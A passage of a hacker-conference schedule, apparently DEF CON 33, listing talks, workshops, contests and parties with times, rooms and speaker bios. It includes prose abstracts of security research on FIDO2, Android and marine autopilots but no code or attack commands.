Matt Cheung started developing his interest in cryptography during an internship in 2011. He worked on implementation of a secure multi-party protocol by adding elliptic curve support to an existing secure text pattern matching protocol. Implementation weaknesses were not a priority and this concerned Matt. This concern prompted him to learn about cryptographic attacks from Dan Boneh's crypto 1 course offered on Coursera and the Matasano/cryptopals challenges. From this experience he has given workshops at the Boston Application Security Conference, BSidesLV, DEF CON, and the Crypto and Privacy VillageHe now serves on the programming committee of the Crypto and Privacy Village. He now serves on the programming committee of the Crypto and Privacy Village.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 13:30-14:15 PDT


Title: CTRAPS: CTAP Impersonation and API Confusion Attacks on FIDO2
When: Saturday, Aug 9, 13:30 - 14:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

FIDO2 is the de-facto standard for passwordless and 2FA authentication. FIDO2 relies on the Client-to-Authenticator Protocol (CTAP) to secure communications between clients (e.g., web browsers) and authenticators (e.g., USB dongles). In this talk, we perform a security assessment of CTAP and its Authenticator API. This API is a critical protocol-level attack surface that handles credentials and authenticator settings.

We investigate the standard FIDO2 setup (credentials stored by the relying party) and the most secure setup, where credentials are stored on the authenticator, protected from data breaches. We find that FIDO2 security mechanisms still rely on phishable mechanisms (i.e., PIN) and unclear security boundaries (e.g., trusting unauthenticated clients).

We introduce eleven CTRAPS attacks grouped into two novel classes: Client Impersonation and API Confusion. These attacks exploit CTAP vulnerabilities to wipe credentials, perform unauthorized factory resets, and track users. Our open-source toolkit implements the attacks on two Android apps, an Electron app, and a Proxmark3 script, supporting the USB HID and NFC transports. In our demos, we show how to use our CTRAPS toolkit to exploit popular authenticators, like YubiKeys, and relying parties, like Microsoft and Apple.

References:

Speakers:Marco Casagrande,Daniele Antonioli

SpeakerBio:  Marco Casagrande

Marco Casagrande is a postdoctoral researcher in cybersecurity at the KTH Royal Institute of Technology (Sweden). He specializes in the security of real-world smart devices, including fitness trackers, FIDO authenticators, and electric scooters.

SpeakerBio:  Daniele Antonioli

Daniele Antonioli is an Assistant Professor at EURECOM in the software and system security (S3) group. He researches and teaches applied system security and privacy, with an emphasis on wireless communication, such as Bluetooth and Wi-Fi, embedded systems, such as cars and fitness trackers, mobile systems, such as smartphones, and cyber-physical systems, such as industrial control systems.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 10:00-10:45 PDT


Title: Cyber Volunteering and Community Defense - DEF CON Franklin and the Cyber Resilience Corps 1 Year In
When: Sunday, Aug 10, 10:00 - 10:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

One year after launch, the DEF CON Franklin returns to the Mainstage with partners from the Cyber Resilience Corps with updates on their mission to empower local communities through cyber volunteering and grassroots defense. We'll share key lessons learned from running on-the-ground volunteering programs and future plans for scaling civic cyber defense by joining forces. From helping small towns respond to ransomware to building rapid-response volunteer teams, this talk will highlight how hackers and technologists are stepping up to protect the public good—one community at a time.

References:

Speakers:Sarah Powazek,Jake Braun,Adrien Ogee

SpeakerBio:  Sarah Powazek

Sarah Powazek is the Program Director of Public Interest Cybersecurity at the UC Berkeley Center for Long-Term Cybersecurity (CLTC), where she leads flagship research on defending low-resource organizations like nonprofits, municipalities, and schools from cyber attacks. She serves as Co-Chair of the Cyber Resilience Corps and is also Senior Advisor for the Consortium of Cybersecurity Clinics, advocating for the expansion of clinical cyber education around the world. Sarah hosts the Cyber Civil Defense Summit, an annual mission-based gathering of cyber defenders to protect the nation’s most vulnerable public infrastructure. Sarah previously worked at CrowdStrike Strategic Advisory Services, and as the Program Manager of the Ransomware Task Force. In her free time, she serves as Deputy Director of DistrictCon, a hacker conference based in D.C.

SpeakerBio:  Jake Braun

Jake Braun is the Executive Director of the Cyber Policy Initiative at the University of Chicago Harris School of Public Policy and Co-Founder of Cambridge Global Advisors, a national security consulting firm. He most recently served in The White House as acting Principal Deputy National Cyber Director. Prior to that role, Mr. Braun was appointed by The President as Senior Counselor to the Secretary of the Department of Homeland Security. Mr. Braun is the author of Democracy in Danger: How Hackers and Activists Exposed Fatal Flaws in the Election System (Rowman & Littlefield, 2019).

In addition to his role at the University of Chicago, Mr. Braun co-founded the DEF CON Voting Machine Hacking Village. In that capacity he co-authored two award-winning reports on the cyber security of our election infrastructure: the DEF CON 25 and 26 Voting Village Reports. Most recently, he partnered with DEF CON to launch “Franklin,” a program to memorialize the most innovative and impactful findings from DEF CON in the annual “Hackers’ Almanack.” “Franklin” also recruits cyber volunteers to support underresourced critical infrastructure.

SpeakerBio:  Adrien Ogee

Adrien spent his career in various cyber crisis response roles in Thales, the French and European Cybersecurity Agencies (ANSSI and ENISA), and the World Economic Forum. At the Institute, he oversees the provision of cybersecurity assistance to vulnerable populations. Adrien holds an MEng in telecommunication and information systems, an MSc in Global Security and has an MBA.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 08:30-09:59 PDT


Title: Cyber Wargames: King of the Hill
When: Saturday, Aug 9, 08:30 - 09:59 PDT
Where: Other / See Description

Description:

Contestants will access a virtual environment with dynamic challenges that need to be exploited and contested. Individuals gain points for each system they are able to plant and maintain their flag on.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 08:30-09:59 PDT


Title: Cyber Wargames: King of the Hill
When: Friday, Aug 8, 08:30 - 09:59 PDT
Where: Other / See Description

Description:

Contestants will access a virtual environment with dynamic challenges that need to be exploited and contested. Individuals gain points for each system they are able to plant and maintain their flag on.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 15:00-16:59 PDT


Title: Cyber Wargames: Redteam Rumble
When: Friday, Aug 8, 15:00 - 16:59 PDT
Where: LVCCWest-Level1-Hall1-W306 - Map

Description:

Redteam Rumble was piloted with a single competition at DEFCON 32 with great success, and we're thrilled to bring it back for DefCon 33! This event is designed with more advanced competitors in mind, and is not for the faint of heart!

Teams will defend their ""Castle,"" a virtual environment comprising several systems and services (both Windows and Linux systems may be included). Each castle has exposed services and exploitable vulnerabilities, along with a few hidden extras.

This event is a free-for-all between 4 teams competing against each other to gain points by controlling services and flags within their own, and each opponents, infrastructure. That means your team will have to balance defending your own systems, while simultaneously hunting for vulnerabilities that can be exploited to control other teams' systems.

Each event will consist of 4 teams competing in a free-for-all for 2 hours. Pre-registration is required.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 15:00-16:59 PDT


Title: Cyber Wargames: Redteam Rumble
When: Saturday, Aug 9, 15:00 - 16:59 PDT
Where: LVCCWest-Level1-Hall1-W306 - Map

Description:

Redteam Rumble was piloted with a single competition at DEFCON 32 with great success, and we're thrilled to bring it back for DefCon 33! This event is designed with more advanced competitors in mind, and is not for the faint of heart!

Teams will defend their ""Castle,"" a virtual environment comprising several systems and services (both Windows and Linux systems may be included). Each castle has exposed services and exploitable vulnerabilities, along with a few hidden extras.

This event is a free-for-all between 4 teams competing against each other to gain points by controlling services and flags within their own, and each opponents, infrastructure. That means your team will have to balance defending your own systems, while simultaneously hunting for vulnerabilities that can be exploited to control other teams' systems.

Each event will consist of 4 teams competing in a free-for-all for 2 hours. Pre-registration is required.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 09:00-14:59 PDT


Title: Cyber Wargames: Strategic Operations
When: Saturday, Aug 9, 09:00 - 14:59 PDT
Where: LVCCWest-Level1-Hall1-W305 - Map

Description:

Strategic Operations will feature two teams going head to head in a classic offense vs defense battle. The defensive team gains points by successfully providing mission critical services during a short scoring window, while offensive teams will gain points by performing targeted service interruptions and data manipulation.

Each event will consist of 2 teams competing in an attacker vs defender battle for anywhere from 30 - 90 minutes. Pre-registration is reccomended, but not required.

One of our goals with Strategic Operations is to provide a fun and engaging experience for attendees that discover us on the competition floor, without requiring prior registration. We will do our best to accomodate walk in participants when possible!


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 09:00-14:59 PDT


Title: Cyber Wargames: Strategic Operations
When: Friday, Aug 8, 09:00 - 14:59 PDT
Where: LVCCWest-Level1-Hall1-W305 - Map

Description:

Strategic Operations will feature two teams going head to head in a classic offense vs defense battle. The defensive team gains points by successfully providing mission critical services during a short scoring window, while offensive teams will gain points by performing targeted service interruptions and data manipulation.

Each event will consist of 2 teams competing in an attacker vs defender battle for anywhere from 30 - 90 minutes. Pre-registration is reccomended, but not required.

One of our goals with Strategic Operations is to provide a fun and engaging experience for attendees that discover us on the competition floor, without requiring prior registration. We will do our best to accomodate walk in participants when possible!


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Saturday - 21:00-01:59 PDT


Title: Cyberdelia Rave
When: Saturday, Aug 9, 21:00 - 01:59 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

DEF CON's first-ever race: Expect to hear hardcore, happy hardcore, breakcore, speedcore, hardstyle. Bring your phat pants, kandi bracelets, and nine inch nails (on finger) to this once in a lifetime rave.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Friday - 16:00-16:30 PDT


Title: Cybersecurity in Latin America: The Untold Stories of Resilience & Innovation
When: Friday, Aug 8, 16:00 - 16:30 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Latin America faces a perfect storm of cyber threats—sophisticated criminal networks, underfunded defenses, and systemic vulnerabilities. Yet, within this chaos lies an untold narrative of adaptation, recursion, and community-driven resilience.

SpeakerBio:  Giovanni Cruz Forero, COO at 7 Way Security

Professional in Cybersecurity with 20 years of experience in the sector, seeks to share knowledge using his experience and knowledge and currently works as COO of 7 Way Security, organizer of BSides Colombia, La Villa and other spaces for building collective knowledge.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Friday - 06:00-10:59 PDT


Title: Cycle Override
When: Friday, Aug 8, 06:00 - 10:59 PDT
Where: Other / See Description

Description:

At 6am on Friday, the @cycle_override crew will be hosting the 14th Defcon Bikeride. We'll meet at a local bikeshop, get some rental bicycles, and about 7am will make the ride out to Red Rocks. It's about a 15 mile ride, all downhill on the return journey. So, if you are crazy enough to join us, get some water, and head over to cycleoverride.org for more info. See you at 6am Friday!


Return to Index    -    Add to Google    -    ics Calendar file

PLV - Friday - 11:45-12:30 PDT


Title: Dark Capabilities: When Tech Companies Become Threat Actors
When: Friday, Aug 8, 11:45 - 12:30 PDT
Where: LVCCWest-Level2-W231 - Map

Description:
Speakers:Tom Cross,Greg Conti

SpeakerBio:  Tom Cross

Tom Cross is an entrepreneur and technology leader with three decades of experience in the hacker community. Tom attended the first DefCon in 1993 and he ran bulletin board systems and listservs in the early 1990’s that served the hacker community in the southeastern United States. He is currently an independent security consultant, Principal at Kopidion, and creator of FeedSeer, a news reader for Mastodon. Previously he was CoFounder and CTO of Drawbridge Networks, Director of Security Research at Lancope, and Manager of the IBM Internet Security Systems X-Force Advanced Research team. He has written papers on collateral damage in cyber conflict, vulnerability disclosure ethics, security issues in internet routers, encrypting open wireless networks, and protecting Wikipedia from vandalism. He has spoken at numerous security conferences, including Black Hat Briefings, Defcon, CyCon, HOPE, Source Boston, FIRST, and Security B-Sides. He has a B.S. in Computer Engineering from the Georgia Institute of Technology. He can be found on Linkedin as https://www.linkedin.com/in/tom-cross-71455/, and on Mastodon as https://ioc.exchange/@decius.

SpeakerBio:  Greg Conti, Co-Founder and Principal at Kopidion

Greg Conti is a hacker, maker, and computer scientist. He is a nine-time DEF CON speaker, a seven-time Black Hat speaker, and has been a Black Hat Trainer for 10 years. He’s taught Adversarial Thinking techniques at West Point, Stanford University bootcamps, NSA/U.S. Cyber Command, and for private clients in the financial and cybersecurity sectors. Greg is Co-Founder and Principal at Kopidion, a cyber security training and professional services firm.

Formerly he served on the West Point faculty for 16 years, where he led their cybersecurity research and education programs. During his U.S. Army and Military Intelligence career he co-created U.S. Cyber Command’s Joint Advanced Cyberwarfare Course, deployed to Iraq as Officer-in-Charge of U.S. Cyber Command’s Expeditionary Cyber Support Element, and was the first Director of the Army Cyber Institute.

Greg is co-author of On Cyber: Towards an Operational Art for Cyber Operations, and approximately 100 articles and papers covering hacking, online privacy, usable security, cyber conflict, and security visualization. Greg holds a B.S. from West Point, an M.S. from Johns Hopkins University, and a Ph.D. from the Georgia Institute of Technology, all in computer science. His work may be found at gregconti.com (https://www.gregconti.com/), kopidion.com (https://www.kopidion.com/) and LinkedIn (https://www.linkedin.com/in/greg-conti-7a8521/).


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Saturday - 21:00-01:59 PDT


Title: Day of the Dead Hacker Party
When: Saturday, Aug 9, 21:00 - 01:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

For all people that want to hang out and celebrate the lives and death of influential people to the hacker community. Attendees are encouraged to dress to kill in Day of the Dead attire or any attire that includes dead heroes. Music will be provided by CURZES and special guest DJs.

Everyone is welcome to join us and celebrate the dead!


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 14:00-15:59 PDT


Title: DC Book Club Discussion
When: Saturday, Aug 9, 14:00 - 15:59 PDT
Where: LVCCWest-Level2-W237 - Map

Description:

Community is essential and so is continual learning. Reading and discussing books can greatly impact an individual’s access and sense of community and knowledge. This DEF CON book discussion will be an accessible group aiming to build community and share out learnings, all in a quieter setting. Come join us in person and discuss what you’ve been reading. This DC Book Club is not locked to a region and we're around all year on Discord, where we discuss books and other topics. This meetup is for those who love books and escaping to the cyperpunk, scifi worlds that inspire DEF CON and our future. Come join us!


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Saturday - 19:30-22:59 PDT


Title: DC NextGen
When: Saturday, Aug 9, 19:30 - 22:59 PDT
Where: LVCCWest-Level2-W230 - Map

Description:

DCNextGen event for youth 8-18 only. The DC NextGen youth party is the perfect place to loosen up and have fun with other kids and teens your age! There is no better time to hang out and chat with the new friends you've made here. All while enjoying fun games and cyber themed activities. Are you ready to build a team and hack the planet?


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 10:30-11:15 PDT


Title: DC101 Panel
When: Friday, Aug 8, 10:30 - 11:15 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

Return to Index    -    Add to Google    -    ics Calendar file

PGE - Friday - 20:00-22:59 PDT


Title: DC404/DC678/DC770/DC470 (Atlanta Metro) Meetup
When: Friday, Aug 8, 20:00 - 22:59 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

They say Atlanta is the city too busy to hate, but it also has too much traffic for its widespread hacker fam to get together in a single meetup. So instead, we're meeting up in the desert during DEF CON! The one time of year when intown, northern burbs, south siders, and anyone else connected to DC404's 25+ year legacy can catch up and share stories. Join us and meet your fellow ATL hackers!


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Thursday - 19:00-20:59 PDT


Title: DC702 Meetup
When: Thursday, Aug 7, 19:00 - 20:59 PDT
Where: LVCCWest-Level2-W237 - Map

Description:

Join the local DC702 Group in this year's official DEF CON Meetup! The meetup will be casual and include typical meetup activities (e.g., socializing, "challenges," lockpicking, music, etc.) and maybe a few little surprises.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Saturday - 12:00-12:59 PDT


Title: DDoS: The Next Generation
When: Saturday, Aug 9, 12:00 - 12:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Future of DDoS Attacks and Prevention

SpeakerBio:  Andrew Cockburn, Netscout
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DDV - Friday - 10:00-16:59 PDT


Title: DDV open and accepting drives for duplication
When: Friday, Aug 8, 10:00 - 16:59 PDT
Where: LVCCWest-Level2-W225 - Map

Description:
We reopen at 10: 00am and accept more drives until we reach capacity (usually late Friday or early Saturday).  Then we copy and copy and copy all the things until we just can't copy any more - first come, first served.  Don't forget - some require 8TB drives now. We run around the clock until we run out of time on Sunday morning with the last possible pickup being before 11:00am on Sunday.

Return to Index    -    Add to Google    -    ics Calendar file

DDV - Saturday - 10:00-16:59 PDT


Title: DDV open and accepting drives for duplication
When: Saturday, Aug 9, 10:00 - 16:59 PDT
Where: LVCCWest-Level2-W225 - Map

Description:
We reopen at 10: 00am and accept more drives until we reach capacity (usually late Friday or early Saturday).  Then we copy and copy and copy all the things until we just can't copy any more - first come, first served.  Don't forget - some require 8TB drives now. We run around the clock until we run out of time on Sunday morning with the last possible pickup being before 11:00am on Sunday.

Return to Index    -    Add to Google    -    ics Calendar file

DDV - Thursday - 16:00-18:59 PDT


Title: DDV starts accepting drives for duplication
When: Thursday, Aug 7, 16:00 - 18:59 PDT
Where: LVCCWest-Level2-W225 - Map

Description:
We start taking drives at 4: 00pm local time on Thursday - possibly a little earlier. We'll keep accepting drives until we reach capacity (usually late Friday or early Saturday).  Then we copy and copy all the things until we just can't copy any more - first come, first served. Note that some sources require 8TB drives now.  We run around the clock until we run out of time on Sunday morning with the last possible pickup being before 11:00am on Sunday.

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 16:30-17:15 PDT


Title: De-Virtualizing the Dragon: Automated Unpacking and Deobfuscation of Nested VM-Based Protectors using Symbolic Execution and Taint Tracking
When: Saturday, Aug 9, 16:30 - 17:15 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

Modern software protectors increasingly rely on complex, often nested, virtualization techniques (VMProtect, Themida, custom solutions) which significantly hinder static and dynamic analysis. This talk introduces DragonSlayer, an automated framework combining symbolic execution with fine-grained dynamic taint tracking to systematically lift obfuscated bytecode from these protectors. Our approach precisely identifies VM handlers, recovers original instruction semantics, automatically unpacks multiple virtualization layers, and reconstructs analyzable representations of protected code. We demonstrate DragonSlayer's effectiveness against the latest commercial VM protectors and custom obfuscation solutions, significantly reducing analysis time from weeks to hours. This presentation includes technical deep-dives into our methodology, real-world case studies, and a demonstration of our tooling that helps reverse engineers slay the virtualization dragon.

References:

  1. Blazytko, T., Contag, M., Aschermann, C., & Holz, T. (2017). Syntia: Synthesizing the semantics of obfuscated code. In 26th USENIX Security Symposium.
  2. Yadegari, B., Johannesmeyer, B., Whitely, B., & Debray, S. (2015). A Generic Approach to Automatic Deobfuscation of Executable Code. In IEEE Symposium on Security and Privacy.
  3. Ming, J., Xu, D., & Wu, D. (2017). VMHunt: A Verifiable Approach to Partially-Virtualized Binary Code Simplification. In ACM Conference on Computer and Communications Security (CCS).
  4. Rolf, R., Luk, C.-K., & Debray, S. (2008). Symbolic/Concrete Execution to Find Bugs in Binary Programs. In IEEE/ACM International Conference on Automated Software Engineering.
  5. Coogan, K., Lu, G., & Debray, S. (2011). Deobfuscation of Virtualization-Obfuscated Software. In ACM Conference on Computer and Communications Security (CCS).
  6. Kinder, J. (2012). Towards Static Analysis of Virtualization-Obfuscated Binaries. In Working Conference on Reverse Engineering (WCRE).
SpeakerBio:  Agostino "Van1sh" Panico

Dr. Agostino "van1sh" Panico is a seasoned offensive security expert with over 15 years of experience specializing in advanced red teaming, exploit development, product security testing, and deception tactics. He is one of the few hundred globally to hold the prestigious GSE (GIAC Security Expert) certification. Driven by a passion for uncovering vulnerabilities, Agostino actively contributes to the security community as an organizer for BSides Italy, fostering collaboration and innovation.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 13:30-14:15 PDT


Title: Dead Made Alive Again: Bypassing Intent Destination Checks and Reintroducing LaunchAnyWhere Privilege Escalation
When: Friday, Aug 8, 13:30 - 14:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

The LaunchAnywhere vulnerability has long been a significant concern in Android security, allowing unprivileged applications to invoke protected activities, even with system-level privileges, and have been actively exploited in the wild in the past.

In response, Google and device vendors have implemented patches, primarily by introducing destination component checks within privileged code before launching Intents. These fixes appeared to have mitigated such risks—at least on the surface. But has the threat truly been eliminated?

In this session, we demonstrate that these defenses remain insufficient. We introduce a new exploitation technique, BadResolve, which bypasses these checks through multiple methods, enabling a zero-permission app to achieve LaunchAnywhere once again. We reveal high-severity vulnerabilities that affect all Android versions, including the latest Android 16 (at time of writing), which have been confirmed and patched by Google. Dead, made alive again— we show how the LaunchAnywhere vulnerability has been reborn. In addition to presenting new exploitation techniques, we tackle the challenge of efficiently and accurately identifying methods in the vast codebases of AOSP and vendor-specific closed-source implementations that could be exploited by BadResolve, using LLM Agents and MCP.

References:

SpeakerBio:  Qidan "flanker_hqd" He

Qidan He (a.k.a Edward Flanker, CISSP) is the winner of multiple Pwn2Own championships and Pwnie Award. He is now the Director & Chief Security Researcher at Dawn Security Lab, JD.com. He has spoken at conferences like Black Hat, DEFCON, RECON, CanSecWest, MOSEC, HITB, PoC, etc. He is also the committee and judge of GeekPwn&GeekCon.


Return to Index    -    Add to Google    -    ics Calendar file

MHV - Saturday - 16:00-16:30 PDT


Title: Dead Reckoning: Hijacking Marine Autopilots
When: Saturday, Aug 9, 16:00 - 16:30 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

We demonstrate a vulnerability in a commonly-used autopilot computer that allows unsigned firmware to be pushed through trusted update channels such as SD cards and NMEA 2000 networked chart plotters without authentication or cryptographic validation. We show how a malicious ‘.swup’ file can be crafted and accepted by the system to gain persistent code execution, enabling arbitrary CAN bus injection on marine control networks. The attack chain, reminiscent of removable media-style delivery in air-gapped systems, demonstrates how firmware-level control in marine environments can be leveraged to disrupt navigation subsystems. We will walk through firmware extraction, reverse engineering of firmware and CAN subroutines, firmware repackaging, and live effects on NMEA 2000 networks. No physical access to the autopilot is needed, the attack leverages trusted firmware delivery via the chart plotter over NMEA 2000.

Speakers:Carson Green,Rik Chatterjee

SpeakerBio:  Carson Green, Colorado State University

Carson Green is a graduate research assistant in systems engineering from Colorado State University, with a bachelor’s degree in electrical engineering. He enjoys designing and debugging PCB’s, researching vulnerabilities in cyber-physical systems, and can often be found playing the banjo.

SpeakerBio:  Rik Chatterjee, Colorado State University

Rik is a PhD student at Colorado State University exploring the tangled edge of embedded systems and cybersecurity. His research focuses into real-world vulnerabilities in automotive and industrial controllers, from reverse-engineering to network protocol level vulnerabilities. He’s previously shared his work at DEF CON and NDSS. When he’s not pulling apart PCBs, you’ll find him elbow-deep in his vegetable garden, proving that both firmware and tomatoes need rooting.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Saturday - 15:50-16:20 PDT


Title: Deconstructing Malware Lineage with Graph Neural Networks
When: Saturday, Aug 9, 15:50 - 16:20 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  David Rushmer
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Deep Dive into Fuzzing
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Fuzzing is a technique of identifying software vulnerabilities by automated corpus generation. It has produced immense results and attracted a lot of visibility from security researchers and professionals in the industry, today fuzzing can be utilized in various ways which can be incorporated into your secure SDLC to discover vulnerabilities in advance and fix them. Attendees will be emulating techniques which will provide a comprehensive understanding of "Crash, Detect & Triage" of fuzzed binaries or software. In "Deep dive into fuzzing" we will be covering a detailed overview of fuzzing and how it can be beneficial to professionals in uncovering security vulnerabilities with a hands-on approach through focus on labs.

Finding vulnerabilities in software requires in-depth knowledge of different technology stacks. Modern day softwares have a huge codebase and may contain vulnerabilities, manually verifying such vulnerabilities is a tedious task and may not be possible in all cases. This training is designed in such a way that it introduces the concept of fuzzing and vulnerability discovery in software’s covering multiple platforms such as Linux & Windows and triage analysis for those vulnerabilities.

Speakers:Zubin Devnani,Dhiraj Mishra

SpeakerBio:  Zubin Devnani

Zubin Devnani is a red teamer by trade, who has identified multiple vulnerabilities in commonly used software. He is a trainer at Blackhat and has delivered multiple workshops, including PHDays and Hacktivity. Utilizes his fuzzing skills in his day to day trade to identify new ways of breaking into enterprises! Blogging at devtty0.io and tweets on @p1ngfl0yd.

SpeakerBio:  Dhiraj Mishra

Dhiraj Mishra is an active speaker who has discovered multiple zero-days in modern web browsers and an open-source contributor. He is a trainer at Blackhat, BruCON, 44CON and presented in conferences such as Ekoparty, NorthSec, Hacktivity, PHDays, Hack in Paris & HITB. In his free time, he blogs at www.inputzero.io/www.fuzzing.at and tweets on @RandomDhiraj.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Deep Dive into Fuzzing
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Fuzzing is a technique of identifying software vulnerabilities by automated corpus generation. It has produced immense results and attracted a lot of visibility from security researchers and professionals in the industry, today fuzzing can be utilized in various ways which can be incorporated into your secure SDLC to discover vulnerabilities in advance and fix them. Attendees will be emulating techniques which will provide a comprehensive understanding of "Crash, Detect & Triage" of fuzzed binaries or software. In "Deep dive into fuzzing" we will be covering a detailed overview of fuzzing and how it can be beneficial to professionals in uncovering security vulnerabilities with a hands-on approach through focus on labs.

Finding vulnerabilities in software requires in-depth knowledge of different technology stacks. Modern day softwares have a huge codebase and may contain vulnerabilities, manually verifying such vulnerabilities is a tedious task and may not be possible in all cases. This training is designed in such a way that it introduces the concept of fuzzing and vulnerability discovery in software’s covering multiple platforms such as Linux & Windows and triage analysis for those vulnerabilities.

Speakers:Zubin Devnani,Dhiraj Mishra

SpeakerBio:  Zubin Devnani

Zubin Devnani is a red teamer by trade, who has identified multiple vulnerabilities in commonly used software. He is a trainer at Blackhat and has delivered multiple workshops, including PHDays and Hacktivity. Utilizes his fuzzing skills in his day to day trade to identify new ways of breaking into enterprises! Blogging at devtty0.io and tweets on @p1ngfl0yd.

SpeakerBio:  Dhiraj Mishra

Dhiraj Mishra is an active speaker who has discovered multiple zero-days in modern web browsers and an open-source contributor. He is a trainer at Blackhat, BruCON, 44CON and presented in conferences such as Ekoparty, NorthSec, Hacktivity, PHDays, Hack in Paris & HITB. In his free time, he blogs at www.inputzero.io/www.fuzzing.at and tweets on @RandomDhiraj.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 14:00-17:59 PDT


Title: Deep-dive into modern network fingerprinting
When: Saturday, Aug 9, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N260 - Map

Description:

In this hands-on workshop you’ll move beyond the theory of network fingerprinting and actually use them in practice at both the TCP and TLS layers. Working in live lab environments, you will:

  1. Capture real TLS ClientHello and TCP handshake packets with muonfp, p0f, ja3, ja3n and ja4
  2. Normalize the JA3 into JA3n, overcoming TLS extension shuffle of modern browsers
  3. Translate MuonFP fingerprint detections into classic p0f signatures
  4. Compile those signatures into BPF and iptables bytecode to dynamically block scanners
  5. Detect & block mass-scan traffic from ZMap and Masscan in real time without interrupting any other traffic.
  6. Forge your own fingerprints (Windows, Linux, common browsers) with Scapy, then validate that your defenses can’t tell you apart.
SpeakerBio:  Vlad Iliushin, Researcher at ELLIO

Vlad is the co-founder and cybersecurity expert at ELLIO and President of the Anti-Malware Testing Standards Organization (AMTSO).A true cybersecurity enthusiast, Vlad’s passionate about network security, IoT, and cyber deception. Before ELLIO, he founded and led the Avast IoT Lab (now Gen Digital), developing security features and researching IoT threats. He has spoken at many conferences, including Web Summit and South by Southwest (SXSW), where he demonstrated IoT vulnerabilities.


Return to Index    -    Add to Google    -    ics Calendar file

PHV - Saturday - 13:00-13:59 PDT


Title: Deepfake Image and Video Detection  
When: Saturday, Aug 9, 13:00 - 13:59 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

Performing analysis of fake images and videos can be challenging considering the plethora of techniques that can be used to create a deepfake. In this session, we'll explore methods for identifying fake images and videos whether created by AI, photoshopped, or GAN-generated media. We'll then use this for the basis of a live demonstration walking through methods of exposing signs of alteration or AI generation using more than a dozen techniques to expose these forgeries. We'll also highlight a free GPT tool for performing your own analysis. Finally, we'll provide additional resources and thoughts for the future of deepfake detection.    

SpeakerBio:  Mike Raggo, Security Researcher at SilentSignals

Michael T. Raggo has over 30 years of security research experience. During this time, he has uncovered and ethically disclosed vulnerabilities in products including Samsung, Checkpoint, and Netgear. Michael is the author of “Mobile Data Loss: Threats & Countermeasures” and “Data Hiding” for Syngress Book. He is also a frequent presenter at security conferences, including Black Hat, DEF CON, Gartner, RSA, DoD Cyber Crime, OWASP, SANS. He was also awarded the Pentagon’s Certificate of Appreciation.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Saturday - 10:00-11:59 PDT


Title: DEF CON Beard and Mustache Contest
When: Saturday, Aug 9, 10:00 - 11:59 PDT
Where: LVCCWest-Level1-Atrium-East-Contest Stage

Description:

Held every year since DEF CON 19 in 2011 (R.I.P. Riviera), (Except during that COVID thing - but we are not going to talk about that COVID thing), the DEF CON (unofficial) Beard and Mustache Contest highlights the intersection of facial hair and hacker culture.

For 2025 there will be four categories for the competition you may only enter one:

Full beard: Self-explanatory, for the truly bearded.

Partial Beard: For those sporting Van Dykes, Goatees, Mutton Chops, and other partial beard styles.

Mustache only: Judging on the mustache only, even if bearded. Bring your Handlebars, Fu Manchus, or whatever adorns your upper lip.

Freestyle: Anything goes, including fake and creatively adorned beards. Creative women often do well in the Freestyle category.

Participant Prerequisites

Real or Fake facial hair as described above.

Pre-Qualification

no


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 15:00-17:59 PDT


Title: DEF CON Closing Ceremonies & Awards
When: Sunday, Aug 10, 15:00 - 17:59 PDT
Where: LVCCWest-Level1-Hall3-Tracks 1-2 - Map

Description:
SpeakerBio:  Jeff "The Dark Tangent" Moss, DEF CON Communications, Inc.

Mr. Moss is an internet security expert and is the founder of Both the Black Hat Briefings and DEF CON Hacking conferences.


Return to Index    -    Add to Google    -    ics Calendar file

DCG - Saturday - 13:00-13:59 PDT


Title: DEF CON Groups (DCGs): Keeping the Signal Alive All Year Long
When: Saturday, Aug 9, 13:00 - 13:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Explores how DCGs extend the DEF CON ethos year-round. Shares practical stories of how local group POCs foster community. Encourages attendees to connect with their local group or form their own group in the absence of a DCG.

Speakers:Adam915,Jayson E Street,Alethe Denis

